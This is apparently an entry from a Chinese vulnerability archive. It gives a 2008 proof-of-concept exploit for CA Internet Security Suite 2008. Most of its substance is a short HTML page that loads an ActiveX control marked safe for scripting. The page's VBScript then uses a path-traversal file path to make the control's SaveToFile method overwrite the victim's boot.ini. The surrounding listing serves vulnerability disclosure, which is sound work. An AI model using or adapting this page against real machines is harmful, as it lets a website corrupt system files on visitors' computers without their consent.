CA Internet Security Suite 2008 (UmxEventCli.dll/SaveToFile()) remote file corruption poc

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052722 漏洞类型
发布时间 2008-05-29 更新时间 2008-05-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008050023
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 <!--
CA Internet Security Suite 2008 (UmxEventCli.dll/SaveToFile())
remote file corruption poc
by Nine:Situations:Group::surfista

this control is safe for scripting
and safe for initialize

original one: http://retrogod.altervista.org/9sg_CA_poc.html
-->
<html><object classid='clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE' id='UmxEventCliLib'/>
</object><script language='vbscript'>
filePath="..\..\..\..\..\..\..\boot.ini"
UmxEventCliLib.SaveToFile filePath
</script></html>